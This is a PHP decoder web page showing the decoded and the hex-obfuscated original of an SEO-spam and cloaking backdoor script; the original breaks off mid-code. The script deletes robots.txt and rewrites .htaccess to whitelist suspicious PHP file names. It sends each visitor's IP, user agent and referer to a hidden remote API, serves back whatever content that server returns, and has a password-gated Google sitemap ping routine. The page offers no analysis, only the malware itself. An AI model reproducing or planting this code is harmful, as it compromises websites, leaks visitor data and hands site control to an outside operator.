Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function CzpJNsfXeSfBEhZFi($rGblVSCxyl, $BzcWSWaLmd, $WSsGxwUBbg) { $tCtqlNaH..
Decoded Output download
<?php
function CzpJNsfXeSfBEhZFi($rGblVSCxyl, $BzcWSWaLmd, $WSsGxwUBbg)
{
$tCtqlNaHMi =
"https://%s/" .
"ping" .
"?" .
"sitemap" .
"=%s%s/%s";
$qFAbTwcPRp = sprintf(
$tCtqlNaHMi,
$rGblVSCxyl,
$WSsGxwUBbg["protocol"],
$WSsGxwUBbg["server_domain"],
$BzcWSWaLmd
);
$apCUkzbrDz = pRLPxnTtUbXlNlbFVDkoewbY($qFAbTwcPRp);
if (isset(${"_REQUEST"}["st"])) {
var_dump($qFAbTwcPRp);
var_dump($apCUkzbrDz);
die();
}
$gSjCDZVaHP = "google";
$IsoLRBPOGm = "success";
$ZOIrQbYCmF = "failed";
if (strpos($apCUkzbrDz, $gSjCDZVaHP) != false) {
die($IsoLRBPOGm);
} else {
$tCtqlNaHMi =
"http://%s/" .
"ping" .
"?" .
"sitemap" .
"=%s%s/%s";
$qFAbTwcPRp = sprintf(
$tCtqlNaHMi,
$rGblVSCxyl,
$WSsGxwUBbg["protocol"],
$WSsGxwUBbg["server_domain"],
$BzcWSWaLmd
);
$apCUkzbrDz = pRLPxnTtUbXlNlbFVDkoewbY($qFAbTwcPRp);
if (strpos($apCUkzbrDz, $gSjCDZVaHP) != false) {
die($IsoLRBPOGm);
}
die($ZOIrQbYCmF);
}
}
function pRLPxnTtUbXlNlbFVDkoewbY(
$noEUjkSVDf,
$SGfElxhAtc = 1,
$TGJPPquHrJ = null,
$bhvUYlLMOt = [],
$UHOABLMSPp = "s"
) {
$sJSpVFSfLS =
"curl_init+curl_setopt+curl_exec|fsockopen|pfsockopen|stream_socket_client|socket_create";
$ExYSPmeEwk = $JdqZlqsgFA = "";
foreach (explode("|", $sJSpVFSfLS) as $ImwWPKRtko) {
$inMfDvtkkY = 1;
foreach (explode("+", $ImwWPKRtko) as $DRsGhgQBVo) {
if (!function_exists($DRsGhgQBVo)) {
$inMfDvtkkY = 0;
}
}
unset($DRsGhgQBVo);
if ($inMfDvtkkY) {
$ExYSPmeEwk = $ImwWPKRtko;
break;
}
}
unset($sJSpVFSfLS, $ImwWPKRtko);
if ($ExYSPmeEwk == "") {
return 0;
}
if (substr($ExYSPmeEwk, 0, 1) == "c") {
$GYhEGFcoZA = curl_init();
curl_setopt($GYhEGFcoZA, CURLOPT_URL, $noEUjkSVDf);
curl_setopt($GYhEGFcoZA, CURLOPT_USERAGENT, $UHOABLMSPp);
curl_setopt($GYhEGFcoZA, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($GYhEGFcoZA, CURLOPT_TIMEOUT, 30);
curl_setopt($GYhEGFcoZA, CURLOPT_FRESH_CONNECT, true);
if ($SGfElxhAtc == 2) {
curl_setopt($GYhEGFcoZA, CURLOPT_POST, 1);
if (is_array($TGJPPquHrJ)) {
curl_setopt(
$GYhEGFcoZA,
CURLOPT_POSTFIELDS,
http_build_query($TGJPPquHrJ)
);
}
}
$aWfmsRobNt = curl_exec($GYhEGFcoZA);
curl_close($GYhEGFcoZA);
/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if ($aWfmsRobNt) {
return $aWfmsRobNt;
}
}
$xlAhNQgKdZ = parse_url($noEUjkSVDf);
isset($xlAhNQgKdZ["host"]) ||
($xlAhNQgKdZ["host"] = "");
isset($xlAhNQgKdZ["path"]) ||
($xlAhNQgKdZ["path"] = "");
isset($xlAhNQgKdZ["query"]) ||
($xlAhNQgKdZ["query"] = "");
isset($xlAhNQgKdZ["port"]) ||
($xlAhNQgKdZ["port"] = "");
$oqDFdSehwW = $xlAhNQgKdZ["path"]
? $xlAhNQgKdZ["path"] .
($xlAhNQgKdZ["query"]
? "?" . $xlAhNQgKdZ["query"]
: "")
: "/";
$XYzstyyUcp = $xlAhNQgKdZ["host"];
if ($xlAhNQgKdZ["scheme"] == "https") {
$fsTIJymElX = "1.1";
$gMPUpIAlhe = empty($xlAhNQgKdZ["port"])
? 443
: $xlAhNQgKdZ["port"];
$XYzstyyUcp = "ssl://";
$XYzstyyUcp .= $xlAhNQgKdZ["host"];
} else {
$fsTIJymElX = "1.0";
$gMPUpIAlhe = empty($xlAhNQgKdZ["port"])
? 80
: $xlAhNQgKdZ["port"];
}
$upuGcXXnrs = "Host: ";
$upuGcXXnrs .= $XYzstyyUcp;
$bhvUYlLMOt[] = $upuGcXXnrs;
$bhvUYlLMOt[] =
"Connection" .
": " .
"Close";
$bhvUYlLMOt[] =
"User-Agent" . ": " . $UHOABLMSPp;
$bhvUYlLMOt[] = "Accept" . ": " . "*/*";
unset($upuGcXXnrs);
if ($SGfElxhAtc == 2) {
if (is_array($TGJPPquHrJ)) {
$TGJPPquHrJ = http_build_query($TGJPPquHrJ);
}
$bhvUYlLMOt[] =
"Content-type" .
": " .
"application/x-www-form-urlencoded";
$bhvUYlLMOt[] =
"Content-Length" .
": " .
strlen($TGJPPquHrJ);
$JdqZlqsgFA =
"POST $oqDFdSehwW HTTP/$fsTIJymElX" .
PHP_EOL .
join(PHP_EOL, $bhvUYlLMOt) .
PHP_EOL .
PHP_EOL .
$TGJPPquHrJ;
unset($TGJPPquHrJ);
} else {
$JdqZlqsgFA =
"GET $oqDFdSehwW HTTP/$fsTIJymElX" .
PHP_EOL .
join(PHP_EOL, $bhvUYlLMOt) .
PHP_EOL .
PHP_EOL;
}
unset($bhvUYlLMOt, $xlAhNQgKdZ, $fsTIJymElX, $oqDFdSehwW);
$kFAZHQmKFF = $VDAgWmfesH = "";
$GPmODoyOhC = null;
if (substr($ExYSPmeEwk, -1) == "n") {
$GPmODoyOhC = $ExYSPmeEwk(
$XYzstyyUcp,
$gMPUpIAlhe,
$kFAZHQmKFF,
$VDAgWmfesH,
30
);
} else {
if (substr($ExYSPmeEwk, -1) == "t") {
$usZYgabsCB = "tcp://";
$usZYgabsCB .= $XYzstyyUcp;
$usZYgabsCB .= ":";
$usZYgabsCB .= $gMPUpIAlhe;
$GPmODoyOhC = stream_socket_client(
$usZYgabsCB,
$kFAZHQmKFF,
$VDAgWmfesH,
30
);
unset($usZYgabsCB);
}
}
$PnaaKgeNhT = "";
if ($GPmODoyOhC) {
stream_set_blocking($GPmODoyOhC, true);
stream_set_timeout($GPmODoyOhC, 30);
fwrite($GPmODoyOhC, $JdqZlqsgFA);
$EBTTgmRjsx = stream_get_meta_data($GPmODoyOhC);
if (!$EBTTgmRjsx["timed_out"]) {
while (!feof($GPmODoyOhC)) {
$vcGEYOoYQH = fgets($GPmODoyOhC);
if (
$vcGEYOoYQH &&
(rawurlencode($vcGEYOoYQH) == "%0D%0A" ||
rawurlencode($vcGEYOoYQH) == "%0A")
) {
break;
}
unset($vcGEYOoYQH);
}
while (!feof($GPmODoyOhC)) {
$zyCrRRwEaA = fread($GPmODoyOhC, 8192);
$PnaaKgeNhT .= $zyCrRRwEaA;
unset($zyCrRRwEaA);
}
}
unset($EBTTgmRjsx);
fclose($GPmODoyOhC);
} else {
if (substr($ExYSPmeEwk, -1) == "e") {
$uTtgmsLRLT = gethostbyname($XYzstyyUcp);
$GPmODoyOhC = $ExYSPmeEwk(AF_INET, SOCK_STREAM, 0);
if (socket_connect($GPmODoyOhC, $uTtgmsLRLT, $gMPUpIAlhe)) {
socket_write($GPmODoyOhC, $JdqZlqsgFA, strlen($JdqZlqsgFA));
while ($GdnGpWHmHI = @socket_read($GPmODoyOhC, 8192)) {
$PnaaKgeNhT .= $GdnGpWHmHI;
unset($GdnGpWHmHI);
}
$PnaaKgeNhT = explode("
", $PnaaKgeNhT);
array_shift($PnaaKgeNhT);
$PnaaKgeNhT = implode("
", $PnaaKgeNhT);
}
socket_close($GPmODoyOhC);
unset($uTtgmsLRLT);
}
}
unset($JdqZlqsgFA, $ExYSPmeEwk, $GPmODoyOhC, $gMPUpIAlhe, $XYzstyyUcp);
return $PnaaKgeNhT;
}
function f_check_htaccess()
{
if (file_exists("robots" . ".txt")) {
@unlink("robots" . ".txt");
}
$XLmJzuOoMZ = "." . "htaccess";
$PnaaKgeNhT = @base64_decode(
"PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"
);
if (file_exists($XLmJzuOoMZ)) {
$mZKxLdZFvB = file_get_contents($XLmJzuOoMZ);
if ($PnaaKgeNhT == $mZKxLdZFvB) {
return;
}
}
@chmod($XLmJzuOoMZ, 0777);
@file_put_contents($XLmJzuOoMZ, $PnaaKgeNhT);
@chmod($XLmJzuOoMZ, 0644);
}
$eSXBYtbGCm =
"OaNHPRD0zcGDeomvDLPzJUszfMRzPABtgYY2Vgx0XLnXLYYxiMHDDIGuhbPGllN0zYjnKlXsCetSo5Sjgbs2L0F=";
$HhiLpXRNOJ = str_split($eSXBYtbGCm);
$hlULBrWblR = "";
for ($zofEVZoVcL = 0; $zofEVZoVcL < count($HhiLpXRNOJ); $zofEVZoVcL++) {
if ($zofEVZoVcL % 2 != 0) {
$hlULBrWblR .= $HhiLpXRNOJ[$zofEVZoVcL];
}
}
$WSsGxwUBbg[
"default_params"
] = $eSXBYtbGCm;
$WSsGxwUBbg["api"] = base64_decode($hlULBrWblR);
$WSsGxwUBbg["server_domain"] = isset(
${"_SERVER"}["HTTP_HOST"]
)
? ${"_SERVER"}["HTTP_HOST"]
: ${"_SERVER"}[
"SERVER_NAME"
];
$WSsGxwUBbg["request_url"] =
${"_SERVER"}[
"REQUEST_URI"
];
$WSsGxwUBbg["referer"] = isset(
${"_SERVER"}[
"HTTP_REFERER"
]
)
? ${"_SERVER"}[
"HTTP_REFERER"
]
: "";
$WSsGxwUBbg["user_agent"] = isset(
${"_SERVER"}[
"HTTP_USER_AGENT"
]
)
? ${"_SERVER"}[
"HTTP_USER_AGENT"
]
: "";
$WSsGxwUBbg["ip"] = isset(
${"_SERVER"}["HTTP_VIA"]
)
? ${"_SERVER"}[
"HTTP_X_FORWARDED_FOR"
]
: ${"_SERVER"}[
"REMOTE_ADDR"
];
if ($WSsGxwUBbg["ip"] == null) {
$WSsGxwUBbg["ip"] = "";
}
$WSsGxwUBbg["protocol"] = isset(
${"_SERVER"}["HTTPS"]
)
? "https://"
: "http://";
$WSsGxwUBbg["language"] = isset(
${"_SERVER"}[
"HTTP_ACCEPT_LANGUAGE"
]
)
? ${"_SERVER"}[
"HTTP_ACCEPT_LANGUAGE"
]
: "";
if (isset(${"_REQUEST"}["params"])) {
print_r($WSsGxwUBbg);
die();
}
if (isset(${"_REQUEST"}["pwd163"])) {
if (
md5(
${"_REQUEST"}["pwd163"] .
"a!#_11AA"
) == "2f7a76f71ff9e24be7c0015ff9cb81d8"
) {
if (isset(${"_GET"}["sitemap"])) {
$BzcWSWaLmd = ${"_GET"}["sitemap"];
$gNCkXcKPUO = "www.google.com";
if (
isset(
${"_GET"}[
"google_url"
]
)
) {
$gNCkXcKPUO =
${"_GET"}[
"google_url"
];
}
CzpJNsfXeSfBEhZFi($gNCkXcKPUO, $BzcWSWaLmd, $WSsGxwUBbg);
}
}
}
f_check_htaccess();
$oCDdLrzurE = [
"domain" =>
$WSsGxwUBbg["server_domain"],
"request_url" =>
$WSsGxwUBbg["request_url"],
"ip" => $WSsGxwUBbg["ip"],
"agent" =>
$WSsGxwUBbg["user_agent"],
"referer" =>
$WSsGxwUBbg["referer"],
"protocol" =>
$WSsGxwUBbg["protocol"],
"language" =>
$WSsGxwUBbg["language"],
];
$PnaaKgeNhT = pRLPxnTtUbXlNlbFVDkoewbY(
$WSsGxwUBbg["api"],
2,
$oCDdLrzurE,
[],
$WSsGxwUBbg["server_domain"]
);
if (isset(${"_REQUEST"}["dump"])) {
var_dump($PnaaKgeNhT);
$PnaaKgeNhT = pRLPxnTtUbXlNlbFVDkoewbY(
"https://" . "google" . ".com"
);
var_dump($PnaaKgeNhT);
die();
}
$PnaaKgeNhT = @gzuncompress(base64_decode($PnaaKgeNhT));
$tSZpeDkfiM = @preg_split("/\|/si", $PnaaKgeNhT, -1, PREG_SPLIT_NO_EMPTY);
if ($tSZpeDkfiM !== false) {
$zyCrRRwEaA = array_pop($tSZpeDkfiM);
$zyCrRRwEaA = base64_decode($zyCrRRwEaA);
foreach ($tSZpeDkfiM as $srcOFcvBhf) {
@header($srcOFcvBhf);
}
echo $zyCrRRwEaA;
die();
} ?>
Did this file decode correctly?
Original Code
<?php
function CzpJNsfXeSfBEhZFi($rGblVSCxyl, $BzcWSWaLmd, $WSsGxwUBbg)
{
$tCtqlNaHMi =
"https://%s/" .
"\x70\x69\x6e\x67" .
"?" .
"\x73\x69\x74\x65\x6d\x61\x70" .
"=%s%s/%s";
$qFAbTwcPRp = sprintf(
$tCtqlNaHMi,
$rGblVSCxyl,
$WSsGxwUBbg["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],
$WSsGxwUBbg["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],
$BzcWSWaLmd
);
$apCUkzbrDz = pRLPxnTtUbXlNlbFVDkoewbY($qFAbTwcPRp);
if (isset(${"\x5f\x52\x45\x51\x55\x45\x53\x54"}["\x73\x74"])) {
var_dump($qFAbTwcPRp);
var_dump($apCUkzbrDz);
die();
}
$gSjCDZVaHP = "\x67\x6f\x6f\x67\x6c\x65";
$IsoLRBPOGm = "\x73\x75\x63\x63\x65\x73\x73";
$ZOIrQbYCmF = "\x66\x61\x69\x6c\x65\x64";
if (strpos($apCUkzbrDz, $gSjCDZVaHP) != false) {
die($IsoLRBPOGm);
} else {
$tCtqlNaHMi =
"http://%s/" .
"\x70\x69\x6e\x67" .
"?" .
"\x73\x69\x74\x65\x6d\x61\x70" .
"=%s%s/%s";
$qFAbTwcPRp = sprintf(
$tCtqlNaHMi,
$rGblVSCxyl,
$WSsGxwUBbg["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"],
$WSsGxwUBbg["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"],
$BzcWSWaLmd
);
$apCUkzbrDz = pRLPxnTtUbXlNlbFVDkoewbY($qFAbTwcPRp);
if (strpos($apCUkzbrDz, $gSjCDZVaHP) != false) {
die($IsoLRBPOGm);
}
die($ZOIrQbYCmF);
}
}
function pRLPxnTtUbXlNlbFVDkoewbY(
$noEUjkSVDf,
$SGfElxhAtc = 1,
$TGJPPquHrJ = null,
$bhvUYlLMOt = [],
$UHOABLMSPp = "s"
) {
$sJSpVFSfLS =
"\x63\x75\x72\x6c\x5f\x69\x6e\x69\x74\x2b\x63\x75\x72\x6c\x5f\x73\x65\x74\x6f\x70\x74\x2b\x63\x75\x72\x6c\x5f\x65\x78\x65\x63\x7c\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e\x7c\x70\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e\x7c\x73\x74\x72\x65\x61\x6d\x5f\x73\x6f\x63\x6b\x65\x74\x5f\x63\x6c\x69\x65\x6e\x74\x7c\x73\x6f\x63\x6b\x65\x74\x5f\x63\x72\x65\x61\x74\x65";
$ExYSPmeEwk = $JdqZlqsgFA = "";
foreach (explode("\x7c", $sJSpVFSfLS) as $ImwWPKRtko) {
$inMfDvtkkY = 1;
foreach (explode("\x2b", $ImwWPKRtko) as $DRsGhgQBVo) {
if (!function_exists($DRsGhgQBVo)) {
$inMfDvtkkY = 0;
}
}
unset($DRsGhgQBVo);
if ($inMfDvtkkY) {
$ExYSPmeEwk = $ImwWPKRtko;
break;
}
}
unset($sJSpVFSfLS, $ImwWPKRtko);
if ($ExYSPmeEwk == "") {
return 0;
}
if (substr($ExYSPmeEwk, 0, 1) == "\x63") {
$GYhEGFcoZA = curl_init();
curl_setopt($GYhEGFcoZA, CURLOPT_URL, $noEUjkSVDf);
curl_setopt($GYhEGFcoZA, CURLOPT_USERAGENT, $UHOABLMSPp);
curl_setopt($GYhEGFcoZA, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($GYhEGFcoZA, CURLOPT_TIMEOUT, 30);
curl_setopt($GYhEGFcoZA, CURLOPT_FRESH_CONNECT, true);
if ($SGfElxhAtc == 2) {
curl_setopt($GYhEGFcoZA, CURLOPT_POST, 1);
if (is_array($TGJPPquHrJ)) {
curl_setopt(
$GYhEGFcoZA,
CURLOPT_POSTFIELDS,
http_build_query($TGJPPquHrJ)
);
}
}
$aWfmsRobNt = curl_exec($GYhEGFcoZA);
curl_close($GYhEGFcoZA);
/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if ($aWfmsRobNt) {
return $aWfmsRobNt;
}
}
$xlAhNQgKdZ = parse_url($noEUjkSVDf);
isset($xlAhNQgKdZ["\x68\x6f\x73\x74"]) ||
($xlAhNQgKdZ["\x68\x6f\x73\x74"] = "");
isset($xlAhNQgKdZ["\x70\x61\x74\x68"]) ||
($xlAhNQgKdZ["\x70\x61\x74\x68"] = "");
isset($xlAhNQgKdZ["\x71\x75\x65\x72\x79"]) ||
($xlAhNQgKdZ["\x71\x75\x65\x72\x79"] = "");
isset($xlAhNQgKdZ["\x70\x6f\x72\x74"]) ||
($xlAhNQgKdZ["\x70\x6f\x72\x74"] = "");
$oqDFdSehwW = $xlAhNQgKdZ["\x70\x61\x74\x68"]
? $xlAhNQgKdZ["\x70\x61\x74\x68"] .
($xlAhNQgKdZ["\x71\x75\x65\x72\x79"]
? "?" . $xlAhNQgKdZ["\x71\x75\x65\x72\x79"]
: "")
: "\x2f";
$XYzstyyUcp = $xlAhNQgKdZ["\x68\x6f\x73\x74"];
if ($xlAhNQgKdZ["\x73\x63\x68\x65\x6d\x65"] == "\x68\x74\x74\x70\x73") {
$fsTIJymElX = "1.1";
$gMPUpIAlhe = empty($xlAhNQgKdZ["\x70\x6f\x72\x74"])
? 443
: $xlAhNQgKdZ["\x70\x6f\x72\x74"];
$XYzstyyUcp = "ssl://";
$XYzstyyUcp .= $xlAhNQgKdZ["\x68\x6f\x73\x74"];
} else {
$fsTIJymElX = "1.0";
$gMPUpIAlhe = empty($xlAhNQgKdZ["\x70\x6f\x72\x74"])
? 80
: $xlAhNQgKdZ["\x70\x6f\x72\x74"];
}
$upuGcXXnrs = "Host: ";
$upuGcXXnrs .= $XYzstyyUcp;
$bhvUYlLMOt[] = $upuGcXXnrs;
$bhvUYlLMOt[] =
"\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e" .
": " .
"\x43\x6c\x6f\x73\x65";
$bhvUYlLMOt[] =
"\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74" . ": " . $UHOABLMSPp;
$bhvUYlLMOt[] = "\x41\x63\x63\x65\x70\x74" . ": " . "*/*";
unset($upuGcXXnrs);
if ($SGfElxhAtc == 2) {
if (is_array($TGJPPquHrJ)) {
$TGJPPquHrJ = http_build_query($TGJPPquHrJ);
}
$bhvUYlLMOt[] =
"\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65" .
": " .
"\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64";
$bhvUYlLMOt[] =
"\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68" .
": " .
strlen($TGJPPquHrJ);
$JdqZlqsgFA =
"POST $oqDFdSehwW HTTP/$fsTIJymElX" .
PHP_EOL .
join(PHP_EOL, $bhvUYlLMOt) .
PHP_EOL .
PHP_EOL .
$TGJPPquHrJ;
unset($TGJPPquHrJ);
} else {
$JdqZlqsgFA =
"GET $oqDFdSehwW HTTP/$fsTIJymElX" .
PHP_EOL .
join(PHP_EOL, $bhvUYlLMOt) .
PHP_EOL .
PHP_EOL;
}
unset($bhvUYlLMOt, $xlAhNQgKdZ, $fsTIJymElX, $oqDFdSehwW);
$kFAZHQmKFF = $VDAgWmfesH = "";
$GPmODoyOhC = null;
if (substr($ExYSPmeEwk, -1) == "\x6e") {
$GPmODoyOhC = $ExYSPmeEwk(
$XYzstyyUcp,
$gMPUpIAlhe,
$kFAZHQmKFF,
$VDAgWmfesH,
30
);
} else {
if (substr($ExYSPmeEwk, -1) == "\x74") {
$usZYgabsCB = "tcp://";
$usZYgabsCB .= $XYzstyyUcp;
$usZYgabsCB .= ":";
$usZYgabsCB .= $gMPUpIAlhe;
$GPmODoyOhC = stream_socket_client(
$usZYgabsCB,
$kFAZHQmKFF,
$VDAgWmfesH,
30
);
unset($usZYgabsCB);
}
}
$PnaaKgeNhT = "";
if ($GPmODoyOhC) {
stream_set_blocking($GPmODoyOhC, true);
stream_set_timeout($GPmODoyOhC, 30);
fwrite($GPmODoyOhC, $JdqZlqsgFA);
$EBTTgmRjsx = stream_get_meta_data($GPmODoyOhC);
if (!$EBTTgmRjsx["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]) {
while (!feof($GPmODoyOhC)) {
$vcGEYOoYQH = fgets($GPmODoyOhC);
if (
$vcGEYOoYQH &&
(rawurlencode($vcGEYOoYQH) == "%0D%0A" ||
rawurlencode($vcGEYOoYQH) == "%0A")
) {
break;
}
unset($vcGEYOoYQH);
}
while (!feof($GPmODoyOhC)) {
$zyCrRRwEaA = fread($GPmODoyOhC, 8192);
$PnaaKgeNhT .= $zyCrRRwEaA;
unset($zyCrRRwEaA);
}
}
unset($EBTTgmRjsx);
fclose($GPmODoyOhC);
} else {
if (substr($ExYSPmeEwk, -1) == "\x65") {
$uTtgmsLRLT = gethostbyname($XYzstyyUcp);
$GPmODoyOhC = $ExYSPmeEwk(AF_INET, SOCK_STREAM, 0);
if (socket_connect($GPmODoyOhC, $uTtgmsLRLT, $gMPUpIAlhe)) {
socket_write($GPmODoyOhC, $JdqZlqsgFA, strlen($JdqZlqsgFA));
while ($GdnGpWHmHI = @socket_read($GPmODoyOhC, 8192)) {
$PnaaKgeNhT .= $GdnGpWHmHI;
unset($GdnGpWHmHI);
}
$PnaaKgeNhT = explode("\r\n\r\n", $PnaaKgeNhT);
array_shift($PnaaKgeNhT);
$PnaaKgeNhT = implode("\r\n\r\n", $PnaaKgeNhT);
}
socket_close($GPmODoyOhC);
unset($uTtgmsLRLT);
}
}
unset($JdqZlqsgFA, $ExYSPmeEwk, $GPmODoyOhC, $gMPUpIAlhe, $XYzstyyUcp);
return $PnaaKgeNhT;
}
function f_check_htaccess()
{
if (file_exists("\x72\x6f\x62\x6f\x74\x73" . ".txt")) {
@unlink("\x72\x6f\x62\x6f\x74\x73" . ".txt");
}
$XLmJzuOoMZ = "." . "\x68\x74\x61\x63\x63\x65\x73\x73";
$PnaaKgeNhT = @base64_decode(
"PEZpbGVzTWF0Y2ggIi4ocHl8ZXhlfHBocCkkIj4KIE9yZGVyIGFsbG93LGRlbnkKIERlbnkgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8RmlsZXNNYXRjaCAiXihhYm91dC5waHB8cmFkaW8ucGhwfGluZGV4LnBocHxjb250ZW50LnBocHxsb2NrMzYwLnBocHxhZG1pbi5waHB8d3AtbG9naW4ucGhwfHdwLWwwZ2luLnBocHx3cC10aGVtZS5waHB8d3Atc2NyaXB0cy5waHB8d3AtZWRpdG9yLnBocHxtYWgucGhwfGpwLnBocHxleHQucGhwKSQiPgogT3JkZXIgYWxsb3csZGVueQogQWxsb3cgZnJvbSBhbGwKPC9GaWxlc01hdGNoPgo8SWZNb2R1bGUgbW9kX3Jld3JpdGUuYz4KUmV3cml0ZUVuZ2luZSBPbgpSZXdyaXRlQmFzZSAvClJld3JpdGVSdWxlIF5pbmRleFwucGhwJCAtIFtMXQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZgpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9ICEtZApSZXdyaXRlUnVsZSAuIC9pbmRleC5waHAgW0xdCjwvSWZNb2R1bGU+"
);
if (file_exists($XLmJzuOoMZ)) {
$mZKxLdZFvB = file_get_contents($XLmJzuOoMZ);
if ($PnaaKgeNhT == $mZKxLdZFvB) {
return;
}
}
@chmod($XLmJzuOoMZ, 0777);
@file_put_contents($XLmJzuOoMZ, $PnaaKgeNhT);
@chmod($XLmJzuOoMZ, 0644);
}
$eSXBYtbGCm =
"OaNHPRD0zcGDeomvDLPzJUszfMRzPABtgYY2Vgx0XLnXLYYxiMHDDIGuhbPGllN0zYjnKlXsCetSo5Sjgbs2L0F=";
$HhiLpXRNOJ = str_split($eSXBYtbGCm);
$hlULBrWblR = "";
for ($zofEVZoVcL = 0; $zofEVZoVcL < count($HhiLpXRNOJ); $zofEVZoVcL++) {
if ($zofEVZoVcL % 2 != 0) {
$hlULBrWblR .= $HhiLpXRNOJ[$zofEVZoVcL];
}
}
$WSsGxwUBbg[
"\x64\x65\x66\x61\x75\x6c\x74\x5f\x70\x61\x72\x61\x6d\x73"
] = $eSXBYtbGCm;
$WSsGxwUBbg["\x61\x70\x69"] = base64_decode($hlULBrWblR);
$WSsGxwUBbg["\x73\x65\x72\x76\x65\x72\x5f\x64\x6f\x6d\x61\x69\x6e"] = isset(
${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]
)
? ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"]
: ${"\x5f\x53\x45\x52\x56\x45\x52"}[
"\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"
];
$WSsGxwUBbg["\x72\x65\x71\x75\x65\x73\x74\x5f\x75\x72\x6c"] =
${"\x5f\x53\x45\x52\x56\x45\x52"}[
"\x52\x45\x51\x55\x45\x53\x54\x5f\x55\x52\x49"
];
$WSsGxwUBbg["\x72\x65\x66\x65\x72\x65\x72"] = isset(
${"\x5f\x53\x45\x52\x56\x45\x52"}[
"\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"
]
)
? ${"\x5f\x53\x45\x52\x56\x45\x52"}[
"\x48\x54\x54\x50\x5f\x52\x45\x46\x45\x52\x45\x52"
]
: "";
$WSsGxwUBbg["\x75\x73\x65\x72\x5f\x61\x67\x65\x6e\x74"] = isset(
${"\x5f\x53\x45\x52\x56\x45\x52"}[
"\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"
]
)
? ${"\x5f\x53\x45\x52\x56\x45\x52"}[
"\x48\x54\x54\x50\x5f\x55\x53\x45\x52\x5f\x41\x47\x45\x4e\x54"
]
: "";
$WSsGxwUBbg["\x69\x70"] = isset(
${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x56\x49\x41"]
)
? ${"\x5f\x53\x45\x52\x56\x45\x52"}[
"\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"
]
: ${"\x5f\x53\x45\x52\x56\x45\x52"}[
"\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"
];
if ($WSsGxwUBbg["\x69\x70"] == null) {
$WSsGxwUBbg["\x69\x70"] = "";
}
$WSsGxwUBbg["\x70\x72\x6f\x74\x6f\x63\x6f\x6c"] = isset(
${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x53"]
)
? "https://"
: "http://";
$WSsGxwUBbg["\x6c\x61\x6e\x67\x75\x61\x67\x65"] = isset(
${"\x5f\x53\x45\x52\x56\x45\x52"}[
"\x48\x54\x54\x50\x5f\x41\x43\x43\x45\x50\x54\x5f\x4c\x41\x4e\x47\x55\x41\x47\x45"
]
)
? ${"\x5f\x53\x45\x52\x56\x45\x52"}[
"\x48\x54\x54\x50\x5f\x41\x43\x43\x45\x50\x54\x5f\x4c\x41\x4e\x47\x55\x41\x47\x45"
]
: "";
if (isset(${"\x5f\x52\x45\x51\x55\x45\x53\x54"}["\x70\x61\x72\x61\x6d\x73"])) {
print_r($WSsGxwUBbg);
die();
}
if (isset(${"\x5f\x52\x45\x51\x55\x45\x53\x54"}["\x70\x77\x64\x31\x36\x33"])) {
if (
md5(
${"\x5f\x52\x45\x51\x55\x45\x53\x54"}["\x70\x77\x64\x31\x36\x33"] .
"a!#_11AA"
) == "2f7a76f71ff9e24be7c0015ff9cb81d8"
) {
